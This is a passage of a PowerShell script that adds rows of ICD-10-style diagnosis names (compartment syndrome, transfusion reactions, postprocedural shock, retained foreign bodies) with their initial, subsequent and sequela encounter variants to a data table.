$DiagnosisList.Rows.Add("Traumatic compartment syndrome of right lower extremity","Traumatic compartment syndrome of right lower extremity, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of left lower extremity","Traumatic compartment syndrome of left lower extremity, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of left lower extremity","Traumatic compartment syndrome of left lower extremity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of left lower extremity","Traumatic compartment syndrome of left lower extremity, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of unspecified lower extremity","Traumatic compartment syndrome of unspecified lower extremity, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of unspecified lower extremity","Traumatic compartment syndrome of unspecified lower extremity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of unspecified lower extremity","Traumatic compartment syndrome of unspecified lower extremity, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of abdomen","Traumatic compartment syndrome of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of abdomen","Traumatic compartment syndrome of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of abdomen","Traumatic compartment syndrome of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of other sites","Traumatic compartment syndrome of other sites, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of other sites","Traumatic compartment syndrome of other sites, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of other sites","Traumatic compartment syndrome of other sites, sequela") + $null = $DiagnosisList.Rows.Add("Other early complications of trauma","Other early complications of trauma, initial encounter") + $null = $DiagnosisList.Rows.Add("Other early complications of trauma","Other early complications of trauma, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other early complications of trauma","Other early complications of trauma, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified early complication of trauma","Unspecified early complication of trauma, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified early complication of trauma","Unspecified early complication of trauma, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified early complication of trauma","Unspecified early complication of trauma, sequela") + $null = $DiagnosisList.Rows.Add("Air embolism following infusion, transfusion and therapeutic injection","Air embolism following infusion, transfusion and therapeutic injection, initial encounter") + $null = $DiagnosisList.Rows.Add("Air embolism following infusion, transfusion and therapeutic injection","Air embolism following infusion, transfusion and therapeutic injection, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Air embolism following infusion, transfusion and therapeutic injection","Air embolism following infusion, transfusion and therapeutic injection, sequela") + $null = $DiagnosisList.Rows.Add("Vascular complications following infusion, transfusion and therapeutic injection","Vascular complications following infusion, transfusion and therapeutic injection, initial encounter") + $null = $DiagnosisList.Rows.Add("Vascular complications following infusion, transfusion and therapeutic injection","Vascular complications following infusion, transfusion and therapeutic injection, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Vascular complications following infusion, transfusion and therapeutic injection","Vascular complications following infusion, transfusion and therapeutic injection, sequela") + $null = $DiagnosisList.Rows.Add("Bloodstream infection due to central venous catheter","Bloodstream infection due to central venous catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Bloodstream infection due to central venous catheter","Bloodstream infection due to central venous catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Bloodstream infection due to central venous catheter","Bloodstream infection due to central venous catheter, sequela") + $null = $DiagnosisList.Rows.Add("Local infection due to central venous catheter","Local infection due to central venous catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Local infection due to central venous catheter","Local infection due to central venous catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Local infection due to central venous catheter","Local infection due to central venous catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other infection due to central venous catheter","Other infection due to central venous catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other infection due to central venous catheter","Other infection due to central venous catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other infection due to central venous catheter","Other infection due to central venous catheter, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified infection due to central venous catheter","Unspecified infection due to central venous catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified infection due to central venous catheter","Unspecified infection due to central venous catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified infection due to central venous catheter","Unspecified infection due to central venous catheter, sequela") + $null = $DiagnosisList.Rows.Add("Acute infection following transfusion, infusion, or injection of blood and blood products","Acute infection following transfusion, infusion, or injection of blood and blood products, initial encounter") + $null = $DiagnosisList.Rows.Add("Acute infection following transfusion, infusion, or injection of blood and blood products","Acute infection following transfusion, infusion, or injection of blood and blood products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Acute infection following transfusion, infusion, or injection of blood and blood products","Acute infection following transfusion, infusion, or injection of blood and blood products, sequela") + $null = $DiagnosisList.Rows.Add("Infection following other infusion, transfusion and therapeutic injection","Infection following other infusion, transfusion and therapeutic injection, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection following other infusion, transfusion and therapeutic injection","Infection following other infusion, transfusion and therapeutic injection, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection following other infusion, transfusion and therapeutic injection","Infection following other infusion, transfusion and therapeutic injection, sequela") + $null = $DiagnosisList.Rows.Add("ABO incompatibility reaction due to transfusion of blood or blood products, unspecified","ABO incompatibility reaction due to transfusion of blood or blood products, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility reaction due to transfusion of blood or blood products, unspecified","ABO incompatibility reaction due to transfusion of blood or blood products, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility reaction due to transfusion of blood or blood products, unspecified","ABO incompatibility reaction due to transfusion of blood or blood products, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with acute hemolytic transfusion reaction","ABO incompatibility with acute hemolytic transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with acute hemolytic transfusion reaction","ABO incompatibility with acute hemolytic transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with acute hemolytic transfusion reaction","ABO incompatibility with acute hemolytic transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with delayed hemolytic transfusion reaction","ABO incompatibility with delayed hemolytic transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with delayed hemolytic transfusion reaction","ABO incompatibility with delayed hemolytic transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with delayed hemolytic transfusion reaction","ABO incompatibility with delayed hemolytic transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with hemolytic transfusion reaction, unspecified","ABO incompatibility with hemolytic transfusion reaction, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with hemolytic transfusion reaction, unspecified","ABO incompatibility with hemolytic transfusion reaction, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("ABO incompatibility with hemolytic transfusion reaction, unspecified","ABO incompatibility with hemolytic transfusion reaction, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other ABO incompatibility reaction due to transfusion of blood or blood products","Other ABO incompatibility reaction due to transfusion of blood or blood products, initial encounter") + $null = $DiagnosisList.Rows.Add("Other ABO incompatibility reaction due to transfusion of blood or blood products","Other ABO incompatibility reaction due to transfusion of blood or blood products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other ABO incompatibility reaction due to transfusion of blood or blood products","Other ABO incompatibility reaction due to transfusion of blood or blood products, sequela") + $null = $DiagnosisList.Rows.Add("Rh incompatibility reaction due to transfusion of blood or blood products, unspecified","Rh incompatibility reaction due to transfusion of blood or blood products, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility reaction due to transfusion of blood or blood products, unspecified","Rh incompatibility reaction due to transfusion of blood or blood products, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility reaction due to transfusion of blood or blood products, unspecified","Rh incompatibility reaction due to transfusion of blood or blood products, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with acute hemolytic transfusion reaction","Rh incompatibility with acute hemolytic transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with acute hemolytic transfusion reaction","Rh incompatibility with acute hemolytic transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with acute hemolytic transfusion reaction","Rh incompatibility with acute hemolytic transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with delayed hemolytic transfusion reaction","Rh incompatibility with delayed hemolytic transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with delayed hemolytic transfusion reaction","Rh incompatibility with delayed hemolytic transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with delayed hemolytic transfusion reaction","Rh incompatibility with delayed hemolytic transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with hemolytic transfusion reaction, unspecified","Rh incompatibility with hemolytic transfusion reaction, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with hemolytic transfusion reaction, unspecified","Rh incompatibility with hemolytic transfusion reaction, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Rh incompatibility with hemolytic transfusion reaction, unspecified","Rh incompatibility with hemolytic transfusion reaction, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other Rh incompatibility reaction due to transfusion of blood or blood products","Other Rh incompatibility reaction due to transfusion of blood or blood products, initial encounter") + $null = $DiagnosisList.Rows.Add("Other Rh incompatibility reaction due to transfusion of blood or blood products","Other Rh incompatibility reaction due to transfusion of blood or blood products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other Rh incompatibility reaction due to transfusion of blood or blood products","Other Rh incompatibility reaction due to transfusion of blood or blood products, sequela") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility reaction due to transfusion of blood or blood products, unspecified","Non-ABO incompatibility reaction due to transfusion of blood or blood products, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility reaction due to transfusion of blood or blood products, unspecified","Non-ABO incompatibility reaction due to transfusion of blood or blood products, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility reaction due to transfusion of blood or blood products, unspecified","Non-ABO incompatibility reaction due to transfusion of blood or blood products, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with acute hemolytic transfusion reaction","Non-ABO incompatibility with acute hemolytic transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with acute hemolytic transfusion reaction","Non-ABO incompatibility with acute hemolytic transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with acute hemolytic transfusion reaction","Non-ABO incompatibility with acute hemolytic transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with delayed hemolytic transfusion reaction","Non-ABO incompatibility with delayed hemolytic transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with delayed hemolytic transfusion reaction","Non-ABO incompatibility with delayed hemolytic transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with delayed hemolytic transfusion reaction","Non-ABO incompatibility with delayed hemolytic transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with hemolytic transfusion reaction, unspecified","Non-ABO incompatibility with hemolytic transfusion reaction, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with hemolytic transfusion reaction, unspecified","Non-ABO incompatibility with hemolytic transfusion reaction, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Non-ABO incompatibility with hemolytic transfusion reaction, unspecified","Non-ABO incompatibility with hemolytic transfusion reaction, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other non-ABO incompatibility reaction due to transfusion of blood or blood products","Other non-ABO incompatibility reaction due to transfusion of blood or blood products, initial encounter") + $null = $DiagnosisList.Rows.Add("Other non-ABO incompatibility reaction due to transfusion of blood or blood products","Other non-ABO incompatibility reaction due to transfusion of blood or blood products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other non-ABO incompatibility reaction due to transfusion of blood or blood products","Other non-ABO incompatibility reaction due to transfusion of blood or blood products, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to administration of blood and blood products","Anaphylactic reaction due to administration of blood and blood products, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to administration of blood and blood products","Anaphylactic reaction due to administration of blood and blood products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to administration of blood and blood products","Anaphylactic reaction due to administration of blood and blood products, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to vaccination","Anaphylactic reaction due to vaccination, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to vaccination","Anaphylactic reaction due to vaccination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to vaccination","Anaphylactic reaction due to vaccination, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other serum","Anaphylactic reaction due to other serum, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other serum","Anaphylactic reaction due to other serum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other serum","Anaphylactic reaction due to other serum, sequela") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to administration of blood and blood products","Other serum reaction due to administration of blood and blood products, initial encounter") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to administration of blood and blood products","Other serum reaction due to administration of blood and blood products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to administration of blood and blood products","Other serum reaction due to administration of blood and blood products, sequela") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to vaccination","Other serum reaction due to vaccination, initial encounter") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to vaccination","Other serum reaction due to vaccination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to vaccination","Other serum reaction due to vaccination, sequela") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to other serum","Other serum reaction due to other serum, initial encounter") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to other serum","Other serum reaction due to other serum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other serum reaction due to other serum","Other serum reaction due to other serum, sequela") + $null = $DiagnosisList.Rows.Add("Extravasation of vesicant antineoplastic chemotherapy","Extravasation of vesicant antineoplastic chemotherapy, initial encounter") + $null = $DiagnosisList.Rows.Add("Extravasation of vesicant antineoplastic chemotherapy","Extravasation of vesicant antineoplastic chemotherapy, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Extravasation of vesicant antineoplastic chemotherapy","Extravasation of vesicant antineoplastic chemotherapy, sequela") + $null = $DiagnosisList.Rows.Add("Extravasation of other vesicant agent","Extravasation of other vesicant agent, initial encounter") + $null = $DiagnosisList.Rows.Add("Extravasation of other vesicant agent","Extravasation of other vesicant agent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Extravasation of other vesicant agent","Extravasation of other vesicant agent, sequela") + $null = $DiagnosisList.Rows.Add("Other complications following infusion, transfusion and therapeutic injection","Other complications following infusion, transfusion and therapeutic injection, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications following infusion, transfusion and therapeutic injection","Other complications following infusion, transfusion and therapeutic injection, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications following infusion, transfusion and therapeutic injection","Other complications following infusion, transfusion and therapeutic injection, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication following infusion and therapeutic injection","Unspecified complication following infusion and therapeutic injection, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication following infusion and therapeutic injection","Unspecified complication following infusion and therapeutic injection, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication following infusion and therapeutic injection","Unspecified complication following infusion and therapeutic injection, sequela") + $null = $DiagnosisList.Rows.Add("Acute hemolytic transfusion reaction, unspecified incompatibility","Acute hemolytic transfusion reaction, unspecified incompatibility, initial encounter") + $null = $DiagnosisList.Rows.Add("Acute hemolytic transfusion reaction, unspecified incompatibility","Acute hemolytic transfusion reaction, unspecified incompatibility, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Acute hemolytic transfusion reaction, unspecified incompatibility","Acute hemolytic transfusion reaction, unspecified incompatibility, sequela") + $null = $DiagnosisList.Rows.Add("Delayed hemolytic transfusion reaction, unspecified incompatibility","Delayed hemolytic transfusion reaction, unspecified incompatibility, initial encounter") + $null = $DiagnosisList.Rows.Add("Delayed hemolytic transfusion reaction, unspecified incompatibility","Delayed hemolytic transfusion reaction, unspecified incompatibility, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Delayed hemolytic transfusion reaction, unspecified incompatibility","Delayed hemolytic transfusion reaction, unspecified incompatibility, sequela") + $null = $DiagnosisList.Rows.Add("Hemolytic transfusion reaction, unspecified incompatibility, unspecified as acute or delayed","Hemolytic transfusion reaction, unspecified incompatibility, unspecified as acute or delayed, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemolytic transfusion reaction, unspecified incompatibility, unspecified as acute or delayed","Hemolytic transfusion reaction, unspecified incompatibility, unspecified as acute or delayed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemolytic transfusion reaction, unspecified incompatibility, unspecified as acute or delayed","Hemolytic transfusion reaction, unspecified incompatibility, unspecified as acute or delayed, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified transfusion reaction","Unspecified transfusion reaction, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified transfusion reaction","Unspecified transfusion reaction, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified transfusion reaction","Unspecified transfusion reaction, sequela") + $null = $DiagnosisList.Rows.Add("Postprocedural shock unspecified","Postprocedural shock unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Postprocedural shock unspecified","Postprocedural shock unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Postprocedural shock unspecified","Postprocedural shock unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiogenic shock","Postprocedural cardiogenic shock, initial encounter") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiogenic shock","Postprocedural cardiogenic shock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Postprocedural cardiogenic shock","Postprocedural cardiogenic shock, sequela") + $null = $DiagnosisList.Rows.Add("Postprocedural septic shock","Postprocedural septic shock, initial encounter") + $null = $DiagnosisList.Rows.Add("Postprocedural septic shock","Postprocedural septic shock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Postprocedural septic shock","Postprocedural septic shock, sequela") + $null = $DiagnosisList.Rows.Add("Other postprocedural shock","Other postprocedural shock, initial encounter") + $null = $DiagnosisList.Rows.Add("Other postprocedural shock","Other postprocedural shock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other postprocedural shock","Other postprocedural shock, sequela") + $null = $DiagnosisList.Rows.Add("Disruption of wound, unspecified","Disruption of wound, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Disruption of wound, unspecified","Disruption of wound, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Disruption of wound, unspecified","Disruption of wound, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Disruption of external operation (surgical) wound, not elsewhere classified","Disruption of external operation (surgical) wound, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Disruption of external operation (surgical) wound, not elsewhere classified","Disruption of external operation (surgical) wound, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Disruption of external operation (surgical) wound, not elsewhere classified","Disruption of external operation (surgical) wound, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Disruption of internal operation (surgical) wound, not elsewhere classified","Disruption of internal operation (surgical) wound, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Disruption of internal operation (surgical) wound, not elsewhere classified","Disruption of internal operation (surgical) wound, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Disruption of internal operation (surgical) wound, not elsewhere classified","Disruption of internal operation (surgical) wound, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Disruption of traumatic injury wound repair","Disruption of traumatic injury wound repair, initial encounter") + $null = $DiagnosisList.Rows.Add("Disruption of traumatic injury wound repair","Disruption of traumatic injury wound repair, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Disruption of traumatic injury wound repair","Disruption of traumatic injury wound repair, sequela") + $null = $DiagnosisList.Rows.Add("Infection following a procedure","Infection following a procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection following a procedure","Infection following a procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection following a procedure","Infection following a procedure, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following surgical operation","Unspecified complication of foreign body accidentally left in body following surgical operation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following surgical operation","Unspecified complication of foreign body accidentally left in body following surgical operation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following surgical operation","Unspecified complication of foreign body accidentally left in body following surgical operation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following infusion or transfusion","Unspecified complication of foreign body accidentally left in body following infusion or transfusion, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following infusion or transfusion","Unspecified complication of foreign body accidentally left in body following infusion or transfusion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following infusion or transfusion","Unspecified complication of foreign body accidentally left in body following infusion or transfusion, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following kidney dialysis","Unspecified complication of foreign body accidentally left in body following kidney dialysis, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following kidney dialysis","Unspecified complication of foreign body accidentally left in body following kidney dialysis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following kidney dialysis","Unspecified complication of foreign body accidentally left in body following kidney dialysis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following injection or immunization","Unspecified complication of foreign body accidentally left in body following injection or immunization, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following injection or immunization","Unspecified complication of foreign body accidentally left in body following injection or immunization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following injection or immunization","Unspecified complication of foreign body accidentally left in body following injection or immunization, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following endoscopic examination","Unspecified complication of foreign body accidentally left in body following endoscopic examination, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following endoscopic examination","Unspecified complication of foreign body accidentally left in body following endoscopic examination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following endoscopic examination","Unspecified complication of foreign body accidentally left in body following endoscopic examination, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following heart catheterization","Unspecified complication of foreign body accidentally left in body following heart catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following heart catheterization","Unspecified complication of foreign body accidentally left in body following heart catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following heart catheterization","Unspecified complication of foreign body accidentally left in body following heart catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following aspiration, puncture or other catheterization","Unspecified complication of foreign body accidentally left in body following aspiration, puncture or other catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following aspiration, puncture or other catheterization","Unspecified complication of foreign body accidentally left in body following aspiration, puncture or other catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following aspiration, puncture or other catheterization","Unspecified complication of foreign body accidentally left in body following aspiration, puncture or other catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following removal of catheter or packing","Unspecified complication of foreign body accidentally left in body following removal of catheter or packing, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following removal of catheter or packing","Unspecified complication of foreign body accidentally left in body following removal of catheter or packing, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following removal of catheter or packing","Unspecified complication of foreign body accidentally left in body following removal of catheter or packing, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following other procedure","Unspecified complication of foreign body accidentally left in body following other procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following other procedure","Unspecified complication of foreign body accidentally left in body following other procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following other procedure","Unspecified complication of foreign body accidentally left in body following other procedure, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following unspecified procedure","Unspecified complication of foreign body accidentally left in body following unspecified procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following unspecified procedure","Unspecified complication of foreign body accidentally left in body following unspecified procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of foreign body accidentally left in body following unspecified procedure","Unspecified complication of foreign body accidentally left in body following unspecified procedure, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following surgical operation","Adhesions due to foreign body accidentally left in body following surgical operation, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following surgical operation","Adhesions due to foreign body accidentally left in body following surgical operation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following surgical operation","Adhesions due to foreign body accidentally left in body following surgical operation, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following infusion or transfusion","Adhesions due to foreign body accidentally left in body following infusion or transfusion, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following infusion or transfusion","Adhesions due to foreign body accidentally left in body following infusion or transfusion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following infusion or transfusion","Adhesions due to foreign body accidentally left in body following infusion or transfusion, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following kidney dialysis","Adhesions due to foreign body accidentally left in body following kidney dialysis, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following kidney dialysis","Adhesions due to foreign body accidentally left in body following kidney dialysis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following kidney dialysis","Adhesions due to foreign body accidentally left in body following kidney dialysis, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following injection or immunization","Adhesions due to foreign body accidentally left in body following injection or immunization, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following injection or immunization","Adhesions due to foreign body accidentally left in body following injection or immunization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following injection or immunization","Adhesions due to foreign body accidentally left in body following injection or immunization, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following endoscopic examination","Adhesions due to foreign body accidentally left in body following endoscopic examination, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following endoscopic examination","Adhesions due to foreign body accidentally left in body following endoscopic examination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following endoscopic examination","Adhesions due to foreign body accidentally left in body following endoscopic examination, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following heart catheterization","Adhesions due to foreign body accidentally left in body following heart catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following heart catheterization","Adhesions due to foreign body accidentally left in body following heart catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following heart catheterization","Adhesions due to foreign body accidentally left in body following heart catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Adhesions due to foreign body accidentally left in body following aspiration, puncture or other catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Adhesions due to foreign body accidentally left in body following aspiration, puncture or other catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Adhesions due to foreign body accidentally left in body following aspiration, puncture or other catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following removal of catheter or packing","Adhesions due to foreign body accidentally left in body following removal of catheter or packing, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following removal of catheter or packing","Adhesions due to foreign body accidentally left in body following removal of catheter or packing, subsequent encounter") + $null 